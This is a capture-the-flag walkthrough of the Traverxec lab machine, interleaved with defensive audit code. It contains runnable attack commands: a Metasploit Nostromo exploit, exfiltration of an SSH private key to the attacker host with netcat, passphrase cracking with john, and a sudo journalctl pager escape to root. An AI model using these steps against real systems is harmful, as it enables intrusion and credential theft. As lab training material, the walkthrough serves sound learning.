Finding out more about the webserver:
nmap -A 10.10.10.165 -oN nmapresults.txt
We see that on port 80, there's a Nostromo service running. Let's see if there's an exploit for it.
Checking for an exploit:
So there are a few. Let's use the Metasploit one for ease of use.
Trying to use the exploit:
msfconsole
search nostromo
use exploit/multi/http/nostromo_code_exec
show options
set RHOSTS 10.10.10.165
set LHOST 10.10.14.99
run
Nice, we do get a shell. Let's improve it now.
To get a better shell:
python -c 'import pty; pty.spawn("/bin/bash")'
export TERM=xterm
Finding the web server's files:
ls -al /var/
ls -al /var/nostromo
We see the conf directory, checking it:
cd /var/nostromo/conf
ls -al
We see a hidden file:
Nice, now we have david's credentials. Poor david.
Now, let's check the other file:
The homedirs setting here should ring a bell.
Can we go into david's home directory?
So we can enter this directory; let's see what's in it.
It says permission denied. Interesting: we can enter the directory but not list its files.
ls -ld .
So we have execute permission on this directory but not read permission, which is unusual.
We know that there's a user.txt file in this directory, so let's check for it.
ls -l user.txt
We can see that the file exists: with execute-only permission on the directory, we can still reach a file as long as we know its exact name.
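The behaviour above (listing refused, but a known file name still resolves) is exactly what the execute bit on a directory means. The following Python example is added here and is not part of the original writeup: it interprets an `ls -ld` mode string such as the `drwx--x--x` seen on david's home, and then reproduces the effect on a scratch directory by dropping the owner's read bit. Root bypasses these permission checks, so the demo also reports the effective uid.

```python
import os
import shutil
import stat
import tempfile

# Added example, not from the writeup. A directory's read bit lets you
# enumerate names (ls); its execute bit lets you traverse it, i.e. resolve a
# path *through* it when you already know the name (ls -l user.txt).

PERM_CLASSES = ("owner", "group", "other")


def dir_rights_from_ls(mode_str: str, who: str) -> dict:
    """Interpret a 10-character `ls -ld` mode string (e.g. 'drwx--x--x')
    for one permission class: 'owner', 'group' or 'other'."""
    if len(mode_str) != 10 or mode_str[0] != "d":
        raise ValueError("expected a directory mode string like drwx--x--x")
    idx = PERM_CLASSES.index(who)
    bits = mode_str[1 + 3 * idx: 4 + 3 * idx]
    return {
        "list": bits[0] == "r",                  # may enumerate entries
        "traverse": bits[2] in ("x", "s", "t"),  # may reach known names
    }


def live_demo() -> dict:
    """Recreate the situation on a scratch directory owned by us: mode 0o311
    gives the owner execute only, so listdir() is refused while stat() of a
    known name succeeds. Root ignores DAC, hence the is_root field."""
    base = tempfile.mkdtemp()
    target = os.path.join(base, "home")
    os.mkdir(target)
    with open(os.path.join(target, "user.txt"), "w") as fh:
        fh.write("constructed sample file\n")
    result = {"is_root": os.geteuid() == 0}
    os.chmod(target, 0o311)  # --x for owner: traverse yes, list no
    try:
        try:
            os.listdir(target)
            result["listdir_denied"] = False
        except PermissionError:
            result["listdir_denied"] = True
        # The name is known, so the path can still be resolved through it.
        st = os.stat(os.path.join(target, "user.txt"))
        result["stat_ok"] = stat.S_ISREG(st.st_mode)
    finally:
        os.chmod(target, 0o700)  # restore so cleanup can remove it
        shutil.rmtree(base)
    return result


if __name__ == "__main__":
    print("other on drwx--x--x:", dir_rights_from_ls("drwx--x--x", "other"))
    print("live demo:", live_demo())
```

Execute-only home directories are a deliberate pattern (the name is the secret), which is why guessing well-known names like `user.txt` or `public_www` still works against them.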
ls -l public_www
Damn, so that exists here too. Let's copy it somewhere else.
mkdir /tmp/public_www
cp -r public_www/* /tmp/public_www          # -r so the protected-file-area subdirectory comes along
cd /tmp/public_www/protected-file-area
tar zxvf backup-ssh-identity-files.tgz
We get a backup of SSH identity files.
Now, in another terminal, in our attacking machine, let's set up a netcat listener to transfer the id_rsa file.
nc -nvlp 4444 > id_rsa
Now, back on the Traverxec machine, let's send that file over to the listener we just started:
nc 10.10.14.99 4444 < id_rsa
Now, back on our own machine: to use that id_rsa file we need its passphrase, so we'll have to crack it. For that we use ssh2john to convert the key into a hash, then john to crack it.
updatedb
locate ssh2john                                 # finding ssh2john
cp $(locate ssh2john) ~/HTB/Traverxec           # copy it to your working directory
python ssh2john.py id_rsa > id_rsa.hash         # converting it
cp $(locate rockyou.txt) ~/HTB/Traverxec        # copying the rockyou.txt password file
gunzip rockyou.txt.gz                           # unzipping rockyou.txt
john --wordlist=rockyou.txt id_rsa.hash         # cracking the passphrase with john
It should now give us the passphrase.
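Why does this crack so quickly? The key came out of a backup in the legacy PEM container, where the passphrase is the only protection and the key derivation is a single MD5 pass. The Python example below is added here (it is not from the writeup) and shows the check a defender would run over a backup like this one: it reports for each private key whether it is encrypted at all, which container it uses, and which cipher and KDF protect it. The key texts are constructed samples, not the real id_rsa.

```python
import base64
import re
import struct

# Added example, not from the original writeup. Legacy PEM keys signal
# encryption with RFC 1421 style headers; OPENSSH-container keys record the
# cipher and KDF names at the start of the base64 blob.


def _ssh_string(blob: bytes, offset: int):
    """Read one uint32-length-prefixed field from an openssh-key-v1 blob."""
    (length,) = struct.unpack(">I", blob[offset:offset + 4])
    start = offset + 4
    return blob[start:start + length], start + length


def key_protection(key_text: str) -> dict:
    """Return container ('pem'/'openssh'), encrypted (bool), cipher, kdf."""
    lines = [ln.strip() for ln in key_text.strip().splitlines()]
    header = lines[0]
    if header == "-----BEGIN OPENSSH PRIVATE KEY-----":
        body = "".join(ln for ln in lines[1:] if not ln.startswith("-----"))
        blob = base64.b64decode(body)
        magic = b"openssh-key-v1\x00"
        if not blob.startswith(magic):
            raise ValueError("not an openssh-key-v1 blob")
        cipher, off = _ssh_string(blob, len(magic))
        kdf, _ = _ssh_string(blob, off)
        cipher, kdf = cipher.decode(), kdf.decode()
        return {"container": "openssh", "encrypted": cipher != "none",
                "cipher": cipher, "kdf": kdf}
    if re.match(r"-----BEGIN (RSA|DSA|EC) PRIVATE KEY-----$", header):
        # Legacy PEM: the passphrase is stretched with OpenSSL's one-pass
        # MD5 EVP_BytesToKey, which is why wordlist attacks on it are cheap.
        hdrs = dict(ln.split(": ", 1) for ln in lines[1:] if ": " in ln)
        encrypted = hdrs.get("Proc-Type", "").endswith("ENCRYPTED")
        cipher = hdrs.get("DEK-Info", "none").split(",")[0] if encrypted else "none"
        return {"container": "pem", "encrypted": encrypted,
                "cipher": cipher, "kdf": "md5-evp-bytestokey" if encrypted else "none"}
    raise ValueError("unrecognised private key container")


def weak_key_report(key_text: str) -> str:
    """One-line verdict a backup audit would emit for the key."""
    info = key_protection(key_text)
    if not info["encrypted"]:
        return "UNENCRYPTED: whoever holds the backup holds the key"
    if info["container"] == "pem":
        return "WEAK KDF: legacy PEM, the passphrase is the only defence and is cheap to guess"
    return f"OK: {info['cipher']} with {info['kdf']} KDF"


# Constructed sample: legacy PEM headers around a placeholder body (not a real key).
SAMPLE_LEGACY_PEM = """-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,0123456789ABCDEF0123456789ABCDEF

QUJDREVGR0hJSktMTU5PUFFSU1RVVldYWVo=
-----END RSA PRIVATE KEY-----
"""


def _openssh_sample(cipher: bytes, kdf: bytes) -> str:
    """Build a constructed openssh-key-v1 prefix (only the fields audited)."""
    blob = b"openssh-key-v1\x00"
    for field in (cipher, kdf):
        blob += struct.pack(">I", len(field)) + field
    body = base64.b64encode(blob).decode()
    return f"-----BEGIN OPENSSH PRIVATE KEY-----\n{body}\n-----END OPENSSH PRIVATE KEY-----\n"


SAMPLE_OPENSSH_ENCRYPTED = _openssh_sample(b"aes256-ctr", b"bcrypt")
SAMPLE_OPENSSH_PLAIN = _openssh_sample(b"none", b"none")

if __name__ == "__main__":
    for name, text in (("legacy", SAMPLE_LEGACY_PEM),
                       ("openssh+bcrypt", SAMPLE_OPENSSH_ENCRYPTED),
                       ("openssh plain", SAMPLE_OPENSSH_PLAIN)):
        print(f"{name}: {weak_key_report(text)}")
```

A key that reports as legacy PEM can be re-encrypted in place with `ssh-keygen -p -a 100 -f id_rsa`, which moves it to the OPENSSH container with bcrypt rounds; that, plus keeping key material out of web-served backups, is what closes the path used in this writeup.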
Now, let's try to SSH into the machine using the id_rsa file and the passphrase.
Before we use the id_rsa file, let's change the permissions to 600.
ssh david@10.10.10.165 -i id_rsa
Enter the passphrase.
Nice, you are in!
Now, for root, it's pretty simple.
We can see that, in the last line, the sudo command is used. Let's check this script.
It doesn't ask for a password, which is nice.
Let's try running the command that it runs:
sudo /usr/bin/journalctl -n5 -unostromo.service
Now that the command runs through sudo, we can probably take advantage of it.
Let's take the terminal out of full screen, make it a small window, and run that command again (the output has to exceed the window height for journalctl to hand it to the pager):
Now journalctl hands its output to less. Because journalctl was run as root through sudo, less inherits that privilege, so a command executed from inside it will run as root too.
Nice, now you should have a new bash shell and you should be root!
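The root of this escalation is a sudoers rule that looks tightly scoped (one binary, fixed arguments) but hands the caller a root-owned interactive pager. The Python example below is added here and is not part of the writeup: it audits sudoers user specifications for commands that are pagers themselves, or that open one unless told not to, and shows the hardened form of the rule beside the weak one. The sudoers text is a constructed sample that mirrors the shape of the rule found on the box, not the box's real file.

```python
import os
import re
import shlex

# Added example, not from the writeup. journalctl, systemctl and git pipe
# long output into a pager by default; under sudo that pager runs as root.

# Programs that open a pager unless told not to, with the suppressing flag.
PAGER_SPAWNERS = {"journalctl": "--no-pager",
                  "systemctl": "--no-pager",
                  "git": "--no-pager"}
PAGERS = {"less", "more", "most", "man"}

# Enough of the sudoers user-spec grammar for one-line rules:
#   user host = (runas) TAG: cmd, cmd ...
RULE_RE = re.compile(
    r"^(?P<user>\S+)\s+(?P<host>\S+)\s*=\s*"
    r"(?:\((?P<runas>[^)]*)\)\s*)?"
    r"(?P<tags>(?:[A-Z]+:\s*)*)"
    r"(?P<cmds>.+)$")


def audit_sudoers(text: str) -> list:
    """Return (line, user, command, reason) for each risky command spec."""
    findings = []
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.split("#", 1)[0].strip()
        if not line or line.startswith("Defaults") or "_Alias" in line:
            continue
        m = RULE_RE.match(line)
        if not m:
            continue
        user = m.group("user")
        for cmd in (c.strip() for c in m.group("cmds").split(",")):
            if cmd == "ALL":
                findings.append((lineno, user, cmd, "unrestricted command set"))
                continue
            argv = shlex.split(cmd)
            prog = os.path.basename(argv[0])
            if prog in PAGERS:
                findings.append((lineno, user, cmd, f"{prog} is an interactive pager"))
            elif prog in PAGER_SPAWNERS and PAGER_SPAWNERS[prog] not in argv[1:]:
                findings.append((lineno, user, cmd,
                                 f"{prog} may open a pager as root; add {PAGER_SPAWNERS[prog]}"))
    return findings


# Constructed sample: line 4 has the shape of the rule on the box, line 5 is
# the hardened journalctl rule next to a systemctl rule with the same flaw.
SAMPLE_SUDOERS = """\
# constructed sample, not the box's real /etc/sudoers
Defaults env_reset
root ALL=(ALL:ALL) ALL
david ALL=(ALL) NOPASSWD: /usr/bin/journalctl -n5 -unostromo.service
ops ALL=(ALL) NOPASSWD: /usr/bin/journalctl --no-pager -n5 -unostromo.service, /usr/bin/systemctl status nostromo.service
"""

if __name__ == "__main__":
    for lineno, user, cmd, why in audit_sudoers(SAMPLE_SUDOERS):
        print(f"line {lineno}: {user}: {cmd!r}: {why}")
```

Pinning `--no-pager` inside the rule is the fix that survives `env_reset` (which strips PAGER and SYSTEMD_PAGER but leaves journalctl's built-in default of less); sudo's `NOEXEC:` tag is a further layer for commands that never legitimately need to spawn child processes.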